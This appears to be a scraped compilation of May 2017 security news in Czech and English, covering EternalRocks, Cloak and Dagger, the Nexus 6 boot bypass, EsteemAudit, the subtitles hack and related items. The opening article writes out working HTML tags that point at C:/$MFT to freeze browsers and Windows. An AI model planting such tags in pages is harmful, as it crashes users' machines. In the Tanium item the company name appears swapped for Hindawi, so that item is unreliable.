Smyšlený soubor nemusíte otevírat ručně. Někdo na něj může odkázat v formou HTML kódu, typicky na webu. Chybu jsem vyzkoušel ve Windows 8.1. IE se neubránil. Stačilo otevřít lokální HTML soubor, ve kterém byla značka s obrázkem <img src=“file:///C:/$MFT/ahoj“>. Místo obrázku je možné použít i odkaz, na který je třeba kliknout <a href=“file:///C:/$MFT/ahoj“>neklikej</a>.

Chrome a Firefox odolaly zavolání souboru přes značku obrázku, ale po kliknutí na odkaz již také zamrzly a následně i Windows. Takto to ovšem fungovalo jen s lokálně uloženým HTML souborem. Pokud jsem otevřel vzdálený přes WWW, tak už Chrome i Firefox byly imunní. Internet Explorer ale opět zešílel.

Systému při útoku nehrozí nebezpečí a cílová skupina je také poměrně úzká, takže se většina lidí nemusí ničeho obávat.

Podobnou chybou mimochodem trpěly i Windows 95 a 98. U nich systém skončil na modré obrazovce smrti, pokud se snažil přistoupit na c:/con/con nebo c:/aux/aux. Chybu bylo možné zneužít i v chatovacích službách či e-mailu s podporou HTML zpráv. Stačilo zavolat obrázek, který se měl nacházet na uvedených adresách.

Netrvalo to dlouho a Microsoft počítačům s Windows 10 v1703 dodává další balík oprav

26.5.2017 CNEWS.CZ Zranitelnosti

Čerstvé vydání Windows je potřeba opravit.

Microsoft vydal další kumulativní aktualizaci pro Windows 10 v1703. Záplatovací úterý sice není, ale Creators Update je stále dost čerstvý a prochází fází intenzívního ladění. Microsoft za pochodu díky zpětné vazbě řeší problémy a systém postupně nasazuje na dalších strojcích. Zatím se nachází jen na 18 % počítačů s Windows 10.

Proto aktualizace vyšla jen pro verzi 1703, zatímco starší a již odladěná vydání Desítek Microsoft nechává spát (až do dalšího záplatovacího úterý). Aktualizace nese označení KB4020102 a číslo sestavení zdvihá na 15063.332. Oprav přináší požehnaně:

Autentizační protokol NTLM nevygeneroval správnou odpověď, když byl aktivní CredGuard, současně bylo používáno NTLMv2 a server poskytl informaci o neexistujícím cíli.
Internet Explorer při otevírání oblíbených položek nerespektoval nastavené pravidlo, aby posílal do Edge všechny stránky, které nejsou zahrnuty seznamu používaném v režimu Enterprise.
V běžném uživatelskému účtu bez správcovských oprávnění nebylo možné v Internet Exploreru 11 instalovat prvky ActiveX.
Některé aplikace přestaly reagovat na vstupní signály, pakliže jste používali více obrazovek současně a rozložili jste na jedné z nich vedle sebe dvě aplikace, takže dohromady vyplňovaly celou obrazovku.
V některých dialozích pro přihlášení k účtu se zcela zbytečně zobrazoval posuvník. Navíc mohl blokovat některá pole.
Virtuální počítač mohl něčem resetu začít využívat techniku Second Level Paging (používanou v případech, kdy dochází paměť), přestože se na hostitelském stroji nacházelo ještě dost paměti.

Nová várka oprav pro Creators Update
V případě některých písem, jež nepodporují Unicode, např. Courier nebo MS Sans Serif, se nevykreslovaly správně znaky. Týkalo se to jen některých jazykových mutací Windows.
Aplikace pro zasílání SMS přestala fungovat při pokusu o odstraněních zpráv.
Po instalaci Creators Updatu nemusely fungovat externí dekodéry zvuku, takže chyběl zvukový výstup.
Prostředí IoT selhávalo ve sledování běhu aplikací na pozadí.
Při používání API MIDI pro Universal Windows Platform byla znatelná vysoká odezva.
Při použití softwaru od výrobce se na počítačích s méně než 4 GB operační paměti nebylo možné nainstalovat síťovou tiskárnu.
PrintBRM selhal v obnově nastavení tiskové fronty, pokud se v systému nacházely stejně pojmenované tiskárny a port byl nastaven na hodnotu FILE:.
Nastavení proxy v uživatelských účtech nemuselo být přeneseno do systémového nastavení proxy.

Malware EternalRocks je ještě vážnější hrozbou než WannaCry

26.5.2017 SecurityWorld Viry
Trend Micro varuje před zákeřným síťovým červem EternalRocks hackerské skupiny Shadowbroker, který využívá více škodlivých kódů než WannaCry.

SpolečnostTrend Micro varuje před novým malwarem EternalRocks. O hrozbě informovalo i Národní centrum kybernetické bezpečnosti. EternalRocks nepoužívá, na rozdíl od ransomwaru WannaCry, pouze dva uniklé nástroje Národní bezpečnostní agentury (NSA) EternalBlue a DoublePulsar. Využívá dalších pět: EternalChampion, EternalRomance, EternalSynergy, ArchiTouch a SMBTouch. Šíří se zneužíváním chyb v protokolu SMB pro sdílení souborů v OS Windows.

Nový kmen malwaru poprvé identifikoval Miroslav Stampar, bezpečnostní výzkumník a člen chorvatského vládního bezpečnostního týmu. Zjistil, že EternalRocks funguje ve dvou fázích. Nejprve stáhne TOR klienta, kterého použije jako komunikační kanál a odešle na Command & Control server. Z něj překvapivě nepřijde odpověď hned, ale až za 24 hodin, což je zřejmě kvůli tomu, aby malware oklamal sandbox a bezpečnostní analýzu.

Odpověď přijde ve formě hlavního komponentu taskhost.exe, která vygeneruje zazipovaný soubor shadowbroker.zip s nástroji NSA. Po rozbalení souboru začne EternalRocks skenovat internet a hledat systémy s otevřeným portem 445, který slouží jako brána pro síťového červa. Některé zranitelnosti zneužité EternalRocks byly vyřešeny březnovou aktualizací Microsoftu MS17-010.

Na rozdíl od WannaCry nevypadá na první pohled EternalRocks tak nebezpečně, protože nemá žádný škodlivý dopad – nepožaduje výkupné ani nezamyká soubory. Skrývá ovšem nebezpečný potenciál, jakmile by někdo malwaru využil a udělal z něj zbraň. EternalRocks navíc nemá zabudovaný „kill switch“, díky kterému by jej bylo možné jednoduše vypnout.

Koho tedy nedonutil ani útok WannaCry aktualizovat svůj systém, toho snad přesvědčí potenciálně ještě nebezpečnější malware EternalRocks. Vzhledem k tomu, že využívá stejných exploitů jako WannaCry, měli by uživatelé a síťoví administrátoři své systémy bezprostředně aktualizovat a zabezpečit. U obou hrozeb se vyplatí myslet na to, že prevence je snazší než odstranění následků prohraného boje s malwarem.

Zamezte ztrátám dat – co jsou nejčastější příčiny problémů?

26.5.2017 SecurityWorld Bezpečnost
Přinášíme přehled chyb, kterými jednotliví zaměstnanci a IT oddělení nejčastěji napomáhají odcizení či ztrátě citlivých podnikových dat a zároveň k nim dodáváme rady, jak se těmto přehmatům co nejlépe vyhnout.

Podle studie firmy IBM z roku 2016 týkající se nákladů vzniklých krádeží či ztrátou dat se průměrná částka vyšplhala z 3,8 milionů dolarů na 4 miliony.

Na detailnější úrovni studie odhaluje, že průměrná hodnota každého ztraceného nebo ukradeného záznamu obsahujícího citlivé a tajné informace se zvedla ze 154 na 158 dolarů. Přicházet o firemní data zkrátka není z finančního hlediska legrace, úniky navíc mohou společnost poškodit i jinak, např. zhoršením reputace u klientů a partnerů.

David Zimmerman, generální ředitel a zakladatel firmy LC Technology, přibližuje pět nejčastějších chyb.

Pokročilá nastavení

Pokročilá nastavení nejsou na počítačích jen tak pro nic za nic. Jde o varování uživateli, který by měl dobře vědět, co vlastně dělá nebo k čemu se chystá. Typickým příkladem podobných nastavení je BIOS: změna setupu v BIOSu je sice obvykle zamýšlená dobře, ale cesta do pekel je v tomto případě skutečně dlážděna dobrými úmysly.

Pokročilá nastavení, která mohou významně změnit způsob, jakým počítač pracuje i pozměnit jeho zabezpečení, by vždy měli přenastavovat zkušení IT technici v zabezpečeném prostředí. Tím se šance na ztrátu dat výrazně sníží.

Ignorování možnosti selhání hardwaru

Jak cloudová řešení postupně zaplňují trh, snižuje se riziko ztráty dat vlivem selhání počítače. HDD a SSD lze poškodit a často se zkrátka časem opotřebují; z těch je však ještě obvykle možno část dat získat zpět.

Problémy často také dělá PC zdroj. Ačkoli ten přímo data neohrožuje, přesto způsobuje dodatečné náklady – laptop nebo spíše server, na kterém se nacházejí data potřebná k činnosti firmy, nemůže jít jen tak do opravy, aniž by se to projevilo na chodu podniku.

Zabezpečená přenosná datová zařízení, například flash disky, nebo cloudová úložiště, znamenají větší míru ochrany dat před ztrátou (nikoli však krádeží).

Ignorování bezpečnostních protokolů

Mnoho „hackerských útoků“, o kterých čteme ve zpravodajství, je způsobeno chybou zaměstnance – vlastně většina. Nastavit jako heslo administrátora „12345“ nebo otevření e-mailové přílohy od neznámé adresy patří mezi podobné chyby.

Podobně špatné je klikání na reklamy na nebezpečných a neseriózních webových stránkách. Důrazná správa hesel a vynucování bezpečnostních standardů při práci s internetem vede k výraznému snížení šance úniku dat – dobře zabezpečená firma je méně lákavý cíl pro hackery.

Ačkoli odhodlaný tým kvalitních kriminálníků dokáže prolomit i velmi, velmi dobré zabezpečení, nejlákavější cíl jsou pro ně ty podniky, ze kterých získají peníze snadno; tedy ty s nejhorším zabezpečením. Dbejte i na dostatečně složitá hesla, která kombinují malá a velká písmena s čísly.

Špatné zálohování

Velmi běžným důvodem ztráty dat je jejich ukládání na lokální úložiště bez další zálohy. Jsme v roce 2017, externí datová úložiště jsou nejen velmi levná, ale také nabízí mnoho různých řešení, cloud i fyzický server. V porovnání s náklady na ztracená data je záloha v úložištích opravdu levná.

Možností je i záloha na hned několika různých cloudech nebo na cloudu a fyzickém médiu zároveň; pak jsou v případě selhání hardwaru nebo lidského faktoru cenné informace snadno nahraditelné.

Ransomware

V poslední době jsou v hackerských kruzích a kyberkriminalitě obecně velmi populární vyděračské praktiky. Nejsnazším způsobem, jak uživatele počítače vydírat, je ransomware. Ransomware převezme soubory na uživatelově počítači a zašifruje je, načež požaduje po oběti zaslání finančních prostředků, po kterých obdrží dešifrovací klíč.

Nejčastěji se ransomware do počítače dostat skrze e-mailovou přílohu nebo prolomením či uhádnutím hesla. Krádež dat přijde ve chvíli, kdy mají hackeři čas mezi infikováním počítače a zasláním platby na jejich účet. Častěji ovšem i v případě příchozí platby hackeři data neodemknou a buď je ponechají zašifrované, nebo je zničí.

All Android Phones Vulnerable to Extremely Dangerous Full Device Takeover Attack
26.5.2017 thehackrenews Android
Researchers have discovered a new attack, dubbed 'Cloak and Dagger', that works against all versions of Android, up to version 7.1.2.
Cloak and Dagger attack allows hackers to silently take full control of your device and steal private data, including keystrokes, chats, device PIN, online account passwords, OTP passcode, and contacts.
What's interesting about Cloak and Dagger attack?
The attack doesn't exploit any vulnerability in Android ecosystem; instead, it abuses a pair of legitimate app permissions that is being widely used in popular applications to access certain features on an Android device.
Researchers at Georgia Institute of Technology have discovered this attack, who successfully performed it on 20 people and none of them were able to detect any malicious activity.
Cloak and Dagger attacks utilise two basic Android permissions:
SYSTEM_ALERT_WINDOW ("draw on top")
BIND_ACCESSIBILITY_SERVICE ("a11y")
The first permission, known as "draw on top," is a legitimate overlay feature that allows apps to overlap on a device's screen and top of other apps.
The second permission, known as "a11y," is designed to help disabled, blind and visually impaired users, allowing them to enter inputs using voice commands, or listen content using screen reader feature.
Scary Things Hackers Can Do to Your Android (Demo)
Since the attack does not require any malicious code to perform the trojanized tasks, it becomes easier for hackers to develop and submit a malicious app to Google Play Store without detection.
Unfortunately, it’s a known fact that the security mechanisms used by Google are not enough to keep all malware out of its app market.
If you are following regular security updates from The Hacker News, you must be better aware of frequent headlines like, "hundreds of apps infected with adware targeting play store users," and "ransomware apps found on play store."
Just last month, researchers uncovered several Android apps masqueraded as an innocent "Funny Videos" app on Play Store with over 5,000 downloads but distributed the 'BankBot banking Trojan' that steal victims' banking passwords.
Here's what the researchers explained how they got on the Google Play Store to perform Cloak & Dagger attacks:
"In particular, we submitted an app requiring these two permissions and containing a non-obfuscated functionality to download and execute arbitrary code (attempting to simulate a clearly malicious behavior): this app got approved after just a few hours (and it is still available on the Google Play Store)." researchers say.
Once installed, the researchers say the attacker can perform various malicious activities including:
Advanced clickjacking attack
Unconstrained keystroke recording
Stealthy phishing attack
Silent installation of a God-mode app (with all permissions enabled)
Silent phone unlocking and arbitrary actions (while keeping the screen off)
In short, the attackers can secretly take over your Android device and spy on your every activity you do on your phone.
Researchers have also provided the video demonstrations of a series of Cloak and Dagger attacks, which will blow your mind, trust me.

Google Can’t Fix It, At Least Not So Fast
University researchers have already disclosed this new attack vector to Google but noted that since the issue resides in the way Android OS has been designed, involving two of its standard features that behave as intended, the problem could be difficult to resolve.
"Changing a feature is not like fixing a bug," said Yanick Fratantonio, the paper's first author. "System designers will now have to think more about how seemingly unrelated features could interact. Features do not operate separately on the device."
As we reported earlier, Google gives "SYSTEM_ALERT_WINDOW" ("draw on top") permission to all applications directly installed from the official Google Play Store since Android Marshmallow (version 6), launched in October 2015.
This feature that lets malicious apps hijack a device's screen is one of the most widely exploited methods used by cyber criminals and hackers to trick unwitting Android users into falling victims for malware and phishing scams.
However, Google has planned to change its policy in 'Android O,' which is scheduled for release in the 3rd quarter this year.
So, users need to wait for a long, long time, as millions of users are still waiting for Android Nougat (N) from their device manufacturers (OEMs).
In other words, the majority of smartphone users will continue to be victimised by ransomware, adware and banking Trojans at least for next one year.
Temporary Mitigation
The easiest way to disable the Cloak and Dagger attacks in Android 7.1.2 is to turn off the "draw on top" permission by heading on to:
Settings → Apps → Gear symbol → Special access → Draw over other apps.
The universal and easiest way to avoid being hacked is always to download apps from Google Play Store, but only from trusted and verified developers.
You are also advised to check app permissions before installing apps. If any app is asking more than what it is meant for, just do not install it.

Terra Privacy Product Uses Dynamic Whitelisting to Block Attacks

26.5.2017 securityweek Safety
Terra Privacy announced on Wednesday a new product that uses dynamic whitelisting to block malware and phishing attacks. A free beta version of the endpoint security product is available for testing.

Terra Privacy was founded by Michael Wood, the cryptographer who designed the REDOC II encryption system. The company’s latest product, Hacker Deterrent Pro, uses dynamically-generated whitelists to ensure that web browsers and other applications only communicate with the servers they are supposed to.

Hacker Deterrent Pro has three main features: Two-Factor Browsing, App Firewall, and DNS Shield.

Two-Factor Browsing ensures that the browser only communicates with trusted domains. To achieve this, the product creates a real-time transient whitelist that contains only the names of webpages opened by the user and the names of other sites from which content is pulled, while any other connection attempt is blocked.

This prevents browser-based threats from communicating with their command and control (C&C) servers, and it can also be used to block commercial trackers.

Traditional whitelisting can be impractical as users have to manually add each website. Hacker Deterrent aims to address this problem by creating transient whitelists that are empty when the web browser is first opened. Each time the user visits a website, that site is automatically added to the whitelist and removed from the whitelist when the page is closed.

This method can also be efficient against sophisticated phishing attacks as Hacker Deterrent Pro will block unauthorized domains even if they look legitimate. The vendor demonstrated its product’s capabilities by showing how it could block phishing sites that use a recently disclosed Unicode-based technique.

According to the company, the solution can also block non-browser Trojans that inject themselves into running processes by preventing them from communicating with domains other than ones belonging to the hijacked app’s developer. For example, the explorer.exe process, which is often targeted by malware, should only be allowed to communicate with Microsoft servers.

The app firewall initially blocks all applications from accessing the Web, and provides information about the app and the host it wants to connect to, allowing users to determine if the connection should be allowed.

The product’s DNS Shield allows users to select DNS servers based on their personal preferences, blocking ISPs from adding their own list of DNS servers. For instance, users can choose DNS servers that reject connections to IPs that are known to host malware.

The beta version of Hacker Deterrent Pro can be tested for free. The commercial version of the product, expected to become available in mid-July, will cost $39.99 per year per endpoint. The solution works on Windows PCs using the Chrome and Firefox web browser.

Survey Shows Disparity in GDPR Preparedness and Concerns

Endpoint Security Firm Tanium Raises $100 Million

26.5.2017 securityweek Security
Emeryville, CA-based endpoint security and systems management firm Tanium announced on Thursday that it has raised $100 million through the sale of common stock.

Tanium raises $100 million

Last month, Hindawi published an open letter addressing accusations that the company exposed a California hospital’s network during sales demos, and reports of a toxic staff relations culture.

Linguistic Analysis Suggests WannaCry Authors Speak Chinese

26.5.2017 securityweek Ransomware
WannaCry ransom note

A linguistic analysis of more than two dozen ransom notes displayed by the WannaCry ransomware suggests that its authors are fluent Chinese speakers and they also appear to know English.

While malware code similarities suggest that WannaCry has been developed by the North Korea-linked threat actor known as Lazarus, some believe the attack does not fit Pyongyang’s style and interests.

Researchers at threat intelligence firm Flashpoint have analyzed 28 WannaCry ransom notes, including ones written in Chinese (both simplified and traditional), Danish, Dutch, English, French, German, Indonesian, Italian, Japanese, Korean, Norwegian, Portuguese, Romanian, Russian, Spanish, Swedish and Turkish.

The linguistic analysis showed that there are significant differences between the notes written in Chinese and the ones written in other languages. Evidence suggests that the Chinese note, which mostly uses proper grammar, punctuation and syntax, was actually written with a Chinese-language keyboard.

One of the words used in the Chinese note is more common in South China, Hong Kong, Singapore and Taiwan, while another term is more widely used in mainland China.

Experts pointed out that the note written in Chinese includes a significant amount of content that is not present in other versions, and they believe it may have served as the source for the English version.

The English note is also well written, but it contains a major grammar mistake that suggests its author is either not a native speaker or possibly someone who is not well educated.

Flashpoint has determined that the English note has been used to translate the text into other languages using a service such as Google Translate. Tests conducted by researchers show that there is a match of at least 96 percent between the WannaCry notes and Google-translated versions of the English message.

While WannaCry may have been developed by more than one individual, Flashpoint said with high confidence that the Chinese-language ransom note was written by someone who is fluent in Chinese. The English note was written by someone who knows English, but does not appear to be a native speaker, the company said.

“Given these facts, it is possible that Chinese is the author(s)’ native tongue, though other languages cannot be ruled out,” Flashpoint said. “It is also possible that the malware author(s)’ intentionally used a machine translation of their native tongue to mask their identity. It is worth noting that characteristics marking the Chinese note as authentic are subtle. It is thus possible, though unlikely, that they were intentionally included to mislead.”

While security firms such as Symantec and Kaspersky presented evidence linking WannaCry to North Korea, Cybereason questioned the apparent connection, pointing to differences in tactics and the fact that two of the most impacted countries, Russia and China, are North Korea’s biggest allies.

Researchers at Flashpoint are not the only ones who mentioned China. James Scott, a senior fellow at the Institute for Critical Infrastructure Technology, also believes the attack may have been conducted by hackers from China's People's Liberation Army "moonlighting" in their spare time, or freelance Chinese hackers hired by Pyongyang.

Google Patches Nexus 6 Secure Boot Bypass

26.5.2017 securityweek Android
One of the vulnerabilities addressed by Google in its May 2017 security patches allowed the bypass of Nexus 6’s Secure Boot through kernel command-line injection, HCL Technologies researchers reveal.

By exploiting the flaw, an attacker with physical access to the device or one with authorized-ADB/fastboot USB access to the (bootloader-locked) device could gain unrestricted root privileges and “completely own the user space.” For that, the attacker would have to load a tampered or malicious initramfs image.

Security researcher Roee Hay also explains that, because the exploitation doesn’t lead to a factory reset, user data remains intact and still encrypted. The vulnerability is tracked as CVE-2016-10277.

The issue, Hay says, is a continuation of CVE-2016-8467, a High risk vulnerability affecting the Nexus 6/6P bootloader, and which was addressed in Google’s January 2017 security patches. The exploit abused fastboot commands to change the androidboot.mode argument in the kernel command line and was addressed by hardening the bootloader.

“Just before Google released the patch, we had discovered way to bypass it on Nexus 6,” the researcher notes.

Because the fsg-id, carrier and console arguments in Nexus 6’s bootloader can be controlled through the fastboot interface (even if the bootloader is locked), one could pass arbitrary kernel command line arguments if the bootloader didn’t sanitize said three arguments. The researchers also found a series of parameters that can contain arbitrary values and which propagate to the kernel command line.

After previously discovering they could tamper with the bootmode, the researchers focused on finding ways to compromise a device further by inserting arbitrary arguments into the command line. Eventually, they discovered that they could defeat Secure Boot by being able to control a single argument.

The exploit relies on initramfs, a cpio (gzipped) archive that gets loaded into rootfs (a RAM filesystem) during the Linux kernel initialization. The bootloader prepares the kernel command line and initramfs parameters for the Linux kernel in the Device Tree Blob, and then transfers execution to the Linux kernel.

A kernel_init function executes the first userspace process called /init, and a kernel command line argument rdinit can override this default value, but exploitation wasn’t effective, mainly because the Nexus 6 initramfs doesn’t contain a large enough set of binaries, the researcher notes.

“Interestingly, we’ve realized that in arm, it is also possible to control, through a kernel command line argument initrd, the physical address where the initramfs is loaded from by the kernel,” Hay says.

By overriding the default values provided by the bootloader in the Device Tree Blob, the researchers caused the Kernel to crash. Next, they focused on loading their own initramfs archive to the device’s memory, through fastboot.

“Note that the Linux Kernel does not re-verify the authenticity of initramfs, it relies on the bootloader to do that, so if we manage to put a tampered initramfs at the controlled phys_initrd_start physical address, the kernel will indeed populate it into rootfs,” the researcher explains.

Fastboot offers a download mechanism via USB and, because the operation is available even on locked bootloaders, an attacker can abuse it to load a tampered initramfs on the device. The exploit is then successful if the bootloader and Kernel don’t overwrite the data before initramfs is populated into rootfs.

The security researchers created a Proof-of-Concept initramfs and made it publicly available on GitHub. Upon gaining full control of rootfs, an attacker can create a malicious /vendor folder, where firmware images of various SoCs available on the board would normally be saved.

“Kernel drivers usually consume these images upon initialization, and update their SoC counterparts if needed. Hence, the attacker could flash unsigned firmware images. We haven’t checked if there are such, but from our experience with other devices, there are. As for signed ones, downgrade attacks might be possible as well,” Hay says.

Google addressed the issue in the May 2017 set of monthly patches by setting the bootloader to sanitize the fsg-id, carrier and console config arguments.

NSA EsteemAudit exploit could trigger a new WannaCry-like attack
26.5.2017 securityaffairs BigBrothers

Security experts from enSilo firm released a free patch for Windows systems vulnerable to the NSA-linked ESTEEMAUDIT Exploit.
The WannaCry emergency could not be ended because the NSA dump leaked by the Shadow Brokers team included many other dangerous exploits.

Last months the Shadow Brokers group released another batch of data containing exploit codes still unpatched by Microsoft such as the “EnglishmanDentist,” “EsteemAudit,” and “ExplodingCan.”

The availability of such exploits and hacking tools represents a serious problem, an attacker with technical knowledge can exploit them to compromise millions of Windows systems across the world.

“Of the three remaining exploits, “EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk.” continues Microsoft.

Let’s start with the EsteemAudit exploit, it is a hacking tool that targets RDP service (port 3389) on machines running no longer supported Microsoft Windows Server 2003 / Windows XP.

It has been estimated that over 24,000 systems remain vulnerable to the EsteemAudit exploit.

“Even one infected machine opens your enterprise to greater exploitation,” explained the security researchers Omri Misgav and Tal Liberman who works for the Ensilo cyber security firm and that developed an unofficial patch for EsteemAudit exploit.

“In the trove of stolen exploits published by the Shadow Group appears ESTEEMAUDIT, an RDP exploit which can allow malware to move laterally within the organization, similar to what we had seen with WannaCry.” reads a blog post from Ensilo.

“enSilo is giving away its patch against ESTEEMAUDIT for free with the intention of helping organizations around the world to better improve their security posture in one easy, but critical step.

It is important to note that patching this exploit will not make these XP systems fully secure. There are still many unpatched vulnerabilities in Windows XP, and we urge organizations to update their systems accordingly.

Until that happens, we believe that in-the-wild critical exploits like ESTEEMAUDIT and ETERNALBLUE must be patched.”

Experts warn of possible exploitation of EsteemAudit exploit in network wormable threats. threat actors in the wild can develop malware that is able to propagate itself in target’s networks without user’s interaction.

“Years later, there continue to be hundreds of millions of machines relying on XP and Server 2003 operating systems in use around the world. Windows XP-based systems currently account for more than 7 percent of desktop operating systems still in use today and the cybersecurity industry estimates that more than 600,000 web-facing computers, which host upwards of 175 million websites, still run Windows Server 2003 accounting for roughly 18 percent of global market share.” continues the blog post from Ensilo.

There are many malware in the wild that already infects systems using as attack vector the RDP protocol, (CrySiS, Dharma, and SamSam), the EsteemAudit exploit can potentially make these threats very aggressive and dangerous.

Users and enterprises running the vulnerable systems are advised to upgrade them to the higher versions to secure themselves from EsteenAudit attacks.
When it is impossible to upgrade the systems it is necessary to secure them, for example disabling RDP port or putting it behind the firewall.

You can also deploy the unofficial patch developed by Ensilo to secure your systems.

Subtitles hack threatens Millions of PCs, Smart TVs, Tablets and Smartphones
26.5.2017 securityaffairs Virus

Security experts from security firm Check Point warn of a subtitles hack threatens Millions of devices.
According to the experts at Check Point, hackers could exploit a new attack vector that uses malicious subtitles to compromise devices via their media players.

Millions of users worldwide can be targeted due to security vulnerabilities in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time, and stream.io.

“Check Point researchers revealed a new attack vector which threatens millions of users worldwide – attack by subtitles.” states the analysis shared by Check Point. “By crafting malicious subtitle files, which are then downloaded by a victim’s media player, attackers can take complete control over any type of device via vulnerabilities found in many popular streaming platforms, including VLC, Kodi (XBMC), Popcorn-Time and strem.io. We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerability reported in recent years.”

The patch for these vulnerabilities are available for download, users should apply them immediately.

According to the security firm, approximately 200 million video players and streamers are currently exposed to subtitle attack.

“We estimate there are approximately 200 million video players and streamers that currently run the vulnerable software, making this one of the most widespread, easily accessed and zero-resistance vulnerability reported in recent years,” continues the analysis. “Hacked in Translation.”

The attackers can craft malicious subtitle files that once executed by a user media player can allow attackers to take complete control over any type of device (i,e, laptops, smart TVs, tablets, and smartphones).

Unlike other attack vectors well known to security firms, this hacking technique is very subtle because subtitles are perceived harmless text files and are not subject to the inspection of security solutions.

subtitles hack infographic_hack_in_translation_v6-1024x946

In subtitles hack, the subtitle can be manipulated by attackers for several malicious purposes.

“This method requires little or no deliberate action on the part of the user, making it all the more dangerous,” states Check Point.

Check Point analyzed vulnerabilities in media players that allow a remote attacker to execute code and gain control full control of the targeted system.

The researchers were able to exploit a flaw in the popular VLC player to trigger a memory corruption issue and to gain control of a PC. Similar successful tests allowed the researchers to demonstrate subtitles hack on other players.

Check Point presented a proof of concept attack, says victims are persuaded to visit a malicious website that uses one of the streaming video players, or they are tricked into running a malicious subtitle file on their system that they intentionally downloaded for use with a video.

“By conducting attacks through subtitles, hackers can take complete control over any device running them. From this point on, the attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device. The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more,” wrote Check Point.

Check Point plans to disclose the technical details of the tests only when software updates will be provided to the users.

Below the list of update currently available:

PopcornTime– Created a Fixed version, however it is not yet available to download in the official website.
The fixed version can be manually downloaded via the following link: https://ci.popcorntime.sh/job/Popcorn-Time-Desktop/249
Kodi– Officialy fixed and available to download on their website. Link: https://kodi.tv/download
VLC– Officially fixed and available to download on their website
Link: http://get.videolan.org/vlc/2.2.5.1/win32/vlc-2.2.5.1-win32.exe
Stremio– Officially Fixed and available to download on their website
Link: https://www.strem.io/

České nemocnice jsou na útoky ransomware zoufale nepřipraveny, varuje expert

25.5.2017 Novinky/Bezpečnost Viry
Česká republika má štěstí, že nebyla v hledáčku tvůrců škodlivého kódu WannaCry. Tuzemská zdravotnická zařízení by dopadla hůře než v Británii.
Úroveň zabezpečení českých nemocnic a dalších zdravotnických zařízení proti kybernetickým útokům je naprosto zoufalá a trvale nedostatečná. Na konferenci Kyberkriminalita a ochrana soukromí, kterou v úterý pořádal Ústavně-právní výbor Senátu ve spolupráci s Národním centrem bezpečnějšího internetu, to řekl Aleš Špidla z Českého institutu manažerů informační bezpečnosti. Útok škodlivého kódu WannaCry, který potrápil britská zdravotní střediska a zasáhl celý svět, by podle Špidly způsobil českým nemocnicím mnohem větší škody.

„Navštívil jsem mnoho nemocnic a vůbec se nedivím, že mají tak velký problém s ransomware WannaCry. Jejich systém zabezpečení, úroveň aplikací, které používají, jsou naprosto nedostatečné,“ prohlásil Špidla. Problém je podle něj i v nedostatečném tlaku státu na provozovatele těchto zařízení, aby lépe ochránili citlivá osobní data pacientů. „V minulosti jsme se zabývali otázkou, zda pod zákon o kybernetické bezpečnosti spadnou zdravotnická zařízení o kapacitě nad 2 500 lůžek. Takové ale v České republice žádné není,“ konstatoval Špidla.

Pomůže evropské nařízení o ochraně dat?
V současné době se podle Špidly vedou odborné diskuse o tom, zda by se zákon o kybernetické bezpečnosti měl vztahovat na zařízení o kapacitě od 500 nebo až od 800 lůžek. „Jenže například IKEM se nevejde ani do toho nižšího parametru. Přitom to je vysoce specializované zařízení se spádovostí pro celou republiku,“ upozornil Špidla. Nepřipravenosti nemocnic na útoky podobné poslední vlně ransomware WannaCry, která se České republice vyhnula (napadeno bylo jen několik set počítačů), podle něj učiní přítrž evropské nařízení o ochraně osobních dat, takzvané GDPR. „Je to šance, jak provést zásadní revizi bezpečnostních opatření,“ míní Špidla.

GDPR určuje firmám, ale i veřejným institucím, které spravují osobní data občanů, zajistit jejich ochranu před zneužitím. Nařízení začne platit v květnu příštího roku a jeho porušení může stát firmu i několik procent z ročního obratu. U nadnárodních společností se navíc sankce bude vypočítávat z obratu mateřského koncernu, nikoli tuzemské pobočky. Mediálně známý případ bývalého zaměstnance mobilního operátora T-Mobile, který vynesl z firmy databáze zákazníků, by tak firmu mohl stát až několik miliard korun.

Nemocnice nejsou jediné, špatně chráněné jsou i chemičky
Aleš Špidla na konferenci Kyberkriminalita a ochrana soukromí zmínil vedle zranitelnosti nemocnic také další rizikové podniky, například chemické závody. „Byl jsem u jednoho klienta, který zastupuje chemičku, která když bouchne, vyhubí polovinu okresu. Když jsem viděl jejich zabezpečení, bál jsem se tam vůbec sedět v zasedačce,“ prohlásil.

Podle Václava Zubra, bezpečnostního experta společnosti ESET, si zatím značná část českých firem i veřejných institucí riziko úniku citlivých dat nebo jejich zašifrování neuvědomuje. „Přestože útok ransomwarem WannaCry Českou republiku v podstatě minul, měl by tento známý incident i u nás pomoci zvýšit povědomí o kybernetických hrozbách a v důsledku vést k lepšímu zabezpečení proti nim,“ řekl Zubr.

Podle statistiky, kterou zveřejnila společnost ESET, vyděračský vir WannaCry postihl zejména internetové uživatele v Rusku, kde byla zaznamenána téměř polovina celosvětových detekcí tohoto škodlivého kódu. Výrazněji se kampaň projevila také na Ukrajině a Tchaj-Wanu. V České republice tento ransomware nenapadl žádnou veřejnou instituci, na Slovensku se s ním potýkala fakultní nemocnice v Nitře.

Díra, na kterou nikdo nemyslel. Počítač můžete ohrozit stažením titulků k filmu
25.5.2017 CNEWS.CZ Zranitelnosti
Výzkumníci bezpečností společnosti Check Point upozornili na závažnou díru, která se nachází v softwarových přehrávačích filmů. Pomocí nakažených titulků můžou hackeři napadnout váš počítač a vzdáleně jej kompletně ovládnout. Zranitelnost obsahují například VLC, Kodi (XBMC) nebo streamovací platformy Popcorn Time či Stremio. Ohroženo je podle odhadů až 200 milionů zařízení.

Tyto přehrávače mají funkci pro automatické stažení titulků dle vybraného jazyka. Stahuje se z některých veřejných repozitářů, jako je například OpenSubtitles.org. Vždy by se automaticky měly vybrat ty s nejlepším hodnocením. Check Pointu se ovšem podařilo do repozitáře nahrát falešné titulky a ještě zmanipulovat hodnocení tak, aby se právě ony vybraly pro autostažení.

Hackování skrz titulky k filmu
Takový soubor ani neuvidíte. Jako hrozbu jej nevidí ani antivirový software. Kód se zkrátka spustí a otevře počítač pro vnější útok. Check Point ukázal i na videu, že po načtení titulků se otevřelo spojení a pak se mohl k počítači oběti připojit přes VNC.

